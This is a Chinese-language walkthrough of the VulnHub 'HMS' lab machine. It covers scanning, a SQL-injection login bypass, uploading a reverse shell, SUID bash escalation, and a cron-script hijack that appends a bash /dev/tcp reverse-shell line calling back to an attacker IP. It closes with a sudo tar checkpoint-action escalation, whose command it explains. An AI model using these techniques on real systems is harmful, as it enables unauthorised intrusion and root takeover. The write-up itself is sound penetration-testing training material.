HMS?:1
项目地址:https://download.vulnhub.com/hms/niveK.ova
是一个打包好的镜像文件
注意:导入 vmx 时一定要选择我已移动,否则没网
使用 Nmap 扫描出开放服务及操作系统版本

FTP 里什么都没有,7080 是一个网页

SQL 注入
Sign In
测试万能密码发现有前端校验

删除 type 属性后登录成功

RCE
Settings
在源代码中找到被注释的文件

访问找到一个上传接口

传入一个反弹 Shell 后在源代码中找到接口


访问后拿到 Shell

提权
Python 升级为交互式 Shell
1 | python -c 'import pty;pty.spawn("/bin/bash")' |
SUID 提权
发现 eren 用户的 /usr/bin/bash 具有 SUID 权限

/usr/bin/bash -p 提权

定时任务
查看定时任务发现运行了一个脚本

查看脚本内容以及权限,当前用户是可以修改 backup.sh 脚本的

写入反弹 Shell
1 | echo 'bash -i >& /dev/tcp/192.168.246.3/6666 0>&1' >> /home/eren/backup.sh |

成功拿到 Shell

/etc/sudoers 配置不当
检查权限发现配置不当

tar 提权
1 | sudo tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh |
GNU tar 的 --checkpoint-action=exec 允许在归档过程中执行任意系统命令
cf:c:create,创建一个新的归档f:file,指定归档文件的名称(后面紧跟文件名)
第一个
/dev/null:指定归档的目标文件第二个
/dev/null:要打包的文件或目录--checkpoint=1:设定检查点间隔为 1 个记录,表示每处理完 1 个记录,就触发一次检查点事件--checkpoint-action=exec=/bin/sh:定义检查点触发的动作
